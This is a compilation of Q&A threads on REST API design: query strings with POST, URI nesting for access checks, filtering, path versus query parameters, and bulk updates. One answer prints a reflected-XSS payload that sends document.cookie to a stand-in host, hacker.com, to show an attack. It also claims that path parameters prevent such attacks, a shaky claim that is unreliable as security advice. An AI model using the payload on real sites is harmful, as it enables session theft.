Is it okay to use HTTP POST method with a query string, if a query string is used to find the resources that need to be updated? - rest

My HTTP API has a method that updates resources found by filter. Practically it is a POST method, that utilizes a query string to find desired resources and transfers data in its body to update found resources:
POST /module/resources?field_1=abc&field_2=def&field_n=xyz
body: {
"desired_field":"desired_data"
}
I've heard it might be a code smell using a POST method and a query string together, but in the case presented above it seems perfectly reasonable to me.
Am I making wrong assumptions here?

Is it okay to use HTTP POST method with a query string, if a query string is used to find the resources that need to be updated?
Yes.
Am I making wrong assumptions here?
No.
The key ideas being that you, as the author of the resource, get to choose its identifier
REST relies instead on the author choosing a resource identifier that best fits the nature of the concept being identified. -- Fielding, 2000
the query is part of the resource identifier
The query component contains non-hierarchical data that, along with data in the path component (Section 3.3), serves to identify a resource within the scope of the URI's scheme and naming authority -- RFC 3986
and that the semantics of HTTP methods are standardized across all resources
Once defined, a standardized method ought to have the same semantics when applied to any resource, though each resource determines for itself whether those semantics are implemented or allowed. -- RFC 7231

When talking about resources, there's from a HTTP/REST perspective no difference between:
/article/1
/article?id=1
So if you do a GET request on either of these to get the article, you can do a PUT or PATCH on either of those to make changes.
However, the way many developers think of query parameters and POST bodies is often 'just a different way to send parameters'. This is incorrect, because they have a pretty distinct meaning, but using both at the same time may confuse some people.
So on a protocol level what you're doing is perfectly fine. I'd argue it's kind of elegant to use the URI as the locator and the body as the main message.

Related

GET Vs POST in REST

According to Rest, we should use GET if we have to retrieve some data, and use POST if it's creating a resource.
But, if we have to take multiple parameters (more than 7-8), or list of UUIDs let's say, then shouldn't we use POST rather than GET?
To avoid:
The complexity of the URL
Future scope to incorporate any new field
URL length which may limit us in future
If we are not encoding our URL then we may risk of exposing params (least significant point though)
Thanks.
GET Vs POST in REST
Use GET when the semantics of GET fit the use case; in other words, when you are trying to retrieve a copy of the latest representation of some resource.
Use POST when no other standardized method supports the semantics you need.
You can use POST for everything, but you give up the advantages of using more specialized methods -- the ability of general purpose components to do intelligent things because they understand the semantics of the request. For instance, GET has safe semantics, which means that a general purpose component knows that it can pre-fetch a representation of the resource before the user needs it, or automatically repeat a request if it doesn't get a response from the server.
What HTTP gives you is a extendable collections of refinements of the general purpose POST method, adding more specific constraints so that general purpose components can leverage the resulting properties.
The complexity of the URL
Complexity in the URL really isn't a big deal, as far as general purpose components are concerned a URL is just a opaque sequence of bytes that happens to abide by certain production rules. For the most part, the effective target-uri of a web request is treated as an atomic unit, so what might seem "complex to a human being doesn't bother the machines at all (for instance, take a look at the URL used when you submit a search from the google home page).
URL length which may limit us in future
We care a bit about URL length. RFC 3986 doesn't restrict the length of the URI, but some implementations of general purpose components will fail if the length is far outside the norm. So you probably don't want to include a url encoded copy of the unabridged works of Shakespeare in the query part of your request.
Future scope to incorporate any new field
Again, there's not a lot of difference here. Adding new optional elements to a URI template is really no different than adding new optional elements to a message template.
we may risk of exposing params
We also want to be careful about sensitive information - as far as the machines are concerned, the URI is an identifier; there's no particular reason to worry about a specific sequence of bytes. Which means that the URI may be exposed at rest (in a clients history, or list of bookmarks, in the servers access logs). Restricting sensitive information to the body of a message reduces the chance of the data escaping beyond its intended use.
Note that REST, and leveraging the different HTTP methods, isn't the only way to get useful work done. SOAP (and more recently gRPC) decided that a different collection of trade offs was better -- in effect, reducing HTTP to transport, rather than an application in itself.
According to Rest, we should ... use POST if it's creating a resource.
This is an incorrect interpretation of REST. It's a very common interpretation, but incorrect. The semantics of POST are defined by RFC 7231; it means that, and not something else.
The suggestion that POST should only be used for create is a misleading over simplification. The earliest references I've been able to find to it is a blog post by Paul Prescod in 2002; and of course it became very popular with the arrival of Ruby on Rails.
But recall: REST is the architectural style of the world wide web. HTML, the most common hypertext media type in use on the web, has native support for only two HTTP methods; GET, used to fetch resource representations from a server, and POST which does everything else.
You should also use POST if you have sensitive data such as username and or password which are best encoded as form parameters (key value pairs)

How to specify data security constraints in REST APIs?

I'm designing a REST API and I'm a big defender of keeping my URL simple, avoiding more than two nested resources.
However, I've been having second thoughts because of data security restrictions that apply to my APIs, that have been trying to force me to nest more resources. I'll try to provide examples to be more specific, as I don't know the correct naming for this situation.
Consider a simple example where I want to get a given contact restriction for a customer, like during what period my customer accepts to be bothered with a phone call:
So, I believe it's simpler to have this:
- GET /customers/12345
- GET /customers/12345/contacts
- GET /contacts/9999
- GET /contacts/9999/restrictions
- GET /restrictions/1
than this:
- GET /customers/12345
- GET /customers/12345/contacts
- GET /customers/12345/contacts/9999
- GET /customers/12345/contacts/9999/restrictions
- GET /customers/12345/contacts/9999/restrictions/1
Note: If there are more related resources, who knows where this will go...
The first case is my favourite because since all resources MUST have a unique identifier, as soon I have its unique identifier I should be able to get the resource instance directly: GET /restrictions/1
The data security restriction in place in my company states that not everyone can see every customers' info (eg: only some managers can access private equity customers). So, to guarantee that, the architects are telling me I should use /customers/12345/contacts/9999/restrictions/1 or /customers/12345/contact-restrictions/1 so that our data access validator in our platform has the customerId to check if the caller has access to it.
I understand the requirement and I see its value. However, I think that this kind of custom security informatio, because that's what I believe to be, should be in a custom header.
So, I believe I should stick to GET /restriction/1 with a custom header "customerId" with the value 12345.
This custom header would only be needed for the apis that have this requirement.
Besides the simpler URL, another advantage of the header, is that if an API didn't start with that security requirement and suddenly needs to comply to it, we could simply require the header to be passed, instead of redefining paths.
I hope I made it clear for you and I'll be looking to learn more about great API design techniques.
Thank you all that reached the end of my post :)
TL;DR: you are fighting over URI design, and REST doesn't actually offer guidance there.
REST, and REST clients, don't distinguish between your "simpler" design and the nested version. A URI is just an opaque sequence of bytes with some little domain agnostic semantics.
/4290c3b2-134e-4647-867a-214d0c866f29
Is a perfectly "RESTFUL" URI. See Stefan Tilkov, REST: I don't Think it Means What You Think it Does.
Fundamentally, REST servers are document stores. You provide a key (the URI) and the server provides the document. Or you provide a key, and the server modifies the document.
How this is implemented is completely at the discretion of the server. It could be that /4290c3b2-134e-4647-867a-214d0c866f29 is used to look up the tuple (12345, 9999, 1), and then the server checks to see if the credentials described in the request header have permission to access that information, and if so the appropriate representation of the resource corresponding to that tuple is returned.
From the client's perspective, it's all the same thing: I provide an opaque identifier in a standard way, and credentials in a standard way, and I get access to the resource or I don't.
the architects are telling me I should use /customers/12345/contacts/9999/restrictions/1 or /customers/12345/contact-restrictions/1 so that our data access validator in our platform has the customerId to check if the caller has access to it.
I understand the requirement and I see its value. However, I think that this kind of custom security information, because that's what I believe to be, should be in a custom header.
There's nothing in REST to back you up. In fact, the notion of introducing a custom header is something of a down check, because your customer header is not something that a generic component is going to know about.
When you need a new header, the "REST" way to go about it is to introduce a new standard. See RFC 5988 for an example.
Fielding, writing in 2008
Every protocol, every media type definition, every URI scheme, and every link relationship type constitutes prior knowledge that the client must know (or learn) in order to make use of that knowledge. REST doesn’t eliminate the need for a clue. What REST does is concentrate that need for prior knowledge into readily standardizable forms.
The architects have a good point - encoding into the uri the hints that make it easier/cheaper/more-reliable to use your data access validator is exactly the sort of thing that allowing the servers to control their own URI namespace is supposed to afford.
The reason that this works, in REST, is that clients don't depend on URI for semantics; instead, they rely on the definitions of the relations that are encoded into the links (or otherwise expressed by the definition of the media type itself).

RESTfully Fetching by Attribute

Which of the following URLs is more RESTful compliant when it comes to fetch only items that have a certain value for attribute?
GET: /items/attribute/{value}
GET: /items/findByAttribute?attribute={value}
GET: /items?attribute={value}
Having in mind that GET: /items returns all items.
Example
GET: /shirts/color/FF9900
GET: /shirts/findByColor?color=FF9900
GET: /shirts?color=FF9900
I think that the last option is the correct one ;-)
Here are some comments for the others:
Generally the path element right after the one that corresponds to the list resource is the identifier of the element. So if you use something at this level, it could be considered as an identifier...
You can have resource to manage a particular field but the URL would be something like /items/{itemid}/fieldname.
You shouldn't use "action names" within the URL (in your example findByAttribute). The HTTP method should correspond to the "action" itself. See this answer if you want to support several actions for an HTTP method: How to Update a REST Resource Collection.
There is a question about how to design search filter: How to desing RESTful advanced search/filter. I think that your use case if a bit simple and using query parameters matches for you.
Otherwise I wrote a post about the way to design a Web API. This could be useful for you. See this link: https://templth.wordpress.com/2014/12/15/designing-a-web-api/.
Hope it helps you,
Thierry
Most certainly this one
GET: /items?attribute={value}
Why?
GET: /items/attribute/{value} is wrong because with REST, url segments represent resources, attribute is not a resource
GET: /items/findByAttribute?attribute={value} is wrong for the same reason really. findByAttribute is not a resource
Using url queries to filter by attributes is perfectly fine, so go with that.
URI semantics are irrelevant to REST. It doesn't make sense to ask which URI is more RESTful. What makes an URI RESTful or not is how the client obtains it. If he's reading URI patterns in documentation and filling placeholders with values, it's not RESTful. If this is news for you, I recommend reading this.
With that in mind, all three examples can be RESTful if the server provided that URI template to the client as a link to query the collection resource filtering by that value, but 3 is definitely the best option since it follows a more conventional query syntax. I wouldn't use 2 since it implies a method call and it looks too RPC for my taste, and I wouldn't use 1 since it implies for a human that it will return only the attribute as a resource.

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.

RESTful resource - accepts a list of objects

I'm building a collection of RESTful resources that work like the following: (I'll use "people" as an example):
GET /people/{key}
- returns a person object (JSON)
GET /people?first_name=Bob
- returns a list of person objects who's "first_name" is "Bob" (JSON)
PUT /people/{key}
- expects a person object in the payload (JSON), updates the person in the
datastore with the {key} found in the URL parameter to match the payload.
If it is a new object, the client specifies the key of the new object.
I feel pretty comfortable with the design so far (although any input/criticism is welcome).
I'd also like to be able to PUT a list of people, however I'm not confident in the RESTfulness of my design. This is what I have in mind:
PUT /people
- expects a list of objects in JSON form with keys included in the object
("key":"32948"). Updates all of the corresponding objects in the datastore.
This operation will be idempotent, so I'd like to use "PUT". However its breaking a rule because a GET request to this same resource will not return the equivalent of what the client just PUT, but would rather return all "people" objects (since there would be no filters on the query). I suspect there are also a few other rules that might be being broken here.
Someone mentioned the use of a "PATCH" request in an earlier question that I had: REST resource with a List property
"PATCH" sounds fantastic, but I don't want to use it because its not in wide use yet and is not compatible with a lot of programs and APIs yet.
I'd prefer not to use POST because POST implies that the request is not idempotent.
Does anyone have any comments / suggestions?
Follow-up:::
While I hesitated to use POST because it seems to be the least-common-denominator, catch-all for RESTful operations and more can be said about this operation (specifically that it is idempotent), PUT cannot be used because its requirements are too narrow. Specifically: the resource is not being completely re-written and the equivalent resource is not being sent back from a GET request to the same resource. Using a PUT with properties outside of it's specifications can cause problems when applications, api's, and/or programmers attempt to work with the resource and are met with unexpected behavior from the resource.
In addition to the accepted answer, Darrel Miller had an excellent suggestion if the operation absolutely had to be a PUT and that was to append a UUID onto the end of the resource path so an equivalent GET request will return the equivalent resource.
POST indicates a generic action other than GET, PUT, and DELETE (the generic hashtable actions). Because the generic hashtable actions are inappropriate, use POST. The semantics of POST are determined by the resource to which an entity is POSTed. This is unlike the semantics of the generic hashtable methods, which are well-known.
POST /people/add-many HTTP/1.1
Host: example.com
Content-Type: application/json
[
{ "name": "Bob" },
{ "name": "Robert" }
]
Using PUT is definitely the wrong verb in this case. POST is meant to do exactly what you are asking. From the HTTP specification:
The fundamental difference between the POST and PUT requests is reflected in the different meaning of the Request-URI. The URI in a POST request identifies the resource that will handle the enclosed entity. That resource might be a data-accepting process, a gateway to some other protocol, or a separate entity that accepts annotations. In contrast, the URI in a PUT request identifies the entity enclosed with the request -- the user agent knows what URI is intended and the server MUST NOT attempt to apply the request to some other resource...
As such, if you want to update multiple resources in a single call, you have to use POST.
Just be cause PUT is required to be idempotent and POST is not, does not mean that POST cannot be idempotent. Your choice of HTTP verb should not be based on that, but based on the relationship of the requested resource and the resource acted upon. If your application is directly handling the resource requested, use PUT. If it is acting on some other resource (or resources, as in your case), use POST.
I really don't see any easy way you could use PUT to create an arbitrary set of people. Unless, you are prepared to have the client generate a GUID and do something like,
PUT /PeopleList/{1E8157D6-3BDC-43b7-817D-C3DA285DD606}
On the server side you could take the people from the list and add them to the /People resource.
A slight variation to this approach would be to get the server to include a link such as
<link rel="AddList" href="/PeopleList/{1E8157D6-3BDC-43b7-817D-C3DA285DD606}"/>
in the People resource. The client would need to know that it needs to PUT a list of people to the AddList link. The server would need to make sure that each time it renders the /People resource it creates a new url for the AddList link.
Regarding Darren Miller's suggestion of using PUT to a GUID (I can't comment...), the point of using PUT would be to achieve idempotency for the operation. The litmus test if idempotency would be this conversation between the client and server:
PUT /PeopleList/{1E8157D6-3BDC-43b7-817D-C3DA285DD606}
204 NO CONTENT (indicates that it all went well)
client loses connection and doesn't see the 204
client automatically retries
PUT /PeopleList/{1E8157D6-3BDC-43b7-817D-C3DA285DD606}
How would the server differentiate the two? If the GUID is "used up" so to speak then the server would have to respond 404 or 410. This introduces a tiny bit of conversational state on the server to remember all the GUIDs that have been used.
Two clients would often see the same I guess, because of caching or simply keeping stale responses around.
I think a smart solution is to use POST to create an (initially empty, short lived) holding area for a resource to which you can PUT, i.e. clients need to POST to create the GUID resource instead of discovering it via a link:
POST /PeopleList/CreateHoldingArea
201 CREATED and Location: /PeopleList/{1E8157D6-3BDC-43b7-817D-C3DA285DD606}
PUT /PeopleList/{1E8157D6-3BDC-43b7-817D-C3DA285DD606}
This would mean that the lost idempotency would not result in much overhead; clients simply create new GUIDs (by POSTing) if they didn't see the initial 201 CREATED response. The "tiny bit of conversational state" would now only be the created but not yet used holding areas.
The ideal solution would of course not require any conversational state on the server, but it eludes me.